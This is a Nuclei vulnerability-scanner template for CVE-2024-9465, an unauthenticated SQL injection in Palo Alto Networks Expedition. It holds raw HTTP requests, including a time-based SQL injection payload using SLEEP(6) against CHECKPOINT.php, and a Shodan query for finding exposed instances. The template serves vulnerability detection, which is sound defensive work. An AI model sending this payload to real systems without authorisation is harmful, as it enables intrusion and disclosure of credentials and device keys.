nuclei-templates/http/cves/2024/CVE-2024-9465.yaml

63 lines
2.2 KiB
YAML

id: CVE-2024-9465
info:
name: Palo Alto Expedition - SQL Injection
author: DhiyaneshDK
severity: high
description: |
An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.
reference:
- https://security.paloaltonetworks.com/PAN-SA-2024-0010
- https://github.com/horizon3ai/CVE-2024-9465/tree/main
- https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
- https://nvd.nist.gov/vuln/detail/CVE-2024-9465
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2024-9465
cwe-id: CWE-89
epss-score: 0.00043
epss-percentile: 0.09688
metadata:
verified: true
max-request: 2
vendor: paloaltonetworks
product: expedition
shodan-query: http.favicon.hash:1499876150
tags: time-based-sqli,cve,cve2024,palo-alto,sqli
flow: http(1) && http(2)
http:
- raw:
- |
POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=get&type=existing_ruleBases&project=pandbRBAC
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "ruleBasesNames")'
condition: and
internal: true
- raw:
- |
@timeout: 20s
POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(6)))test)
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100c7639ed107a37239cbc2c88f37f177636daee512e68b80dfa7e8cca1345924570221008ce6cb504dd08d628dfb2c5a9599bd5a03c5d06f2ec0a38af9c1255354998d20:922c64590222798bb761d5b6d8e72950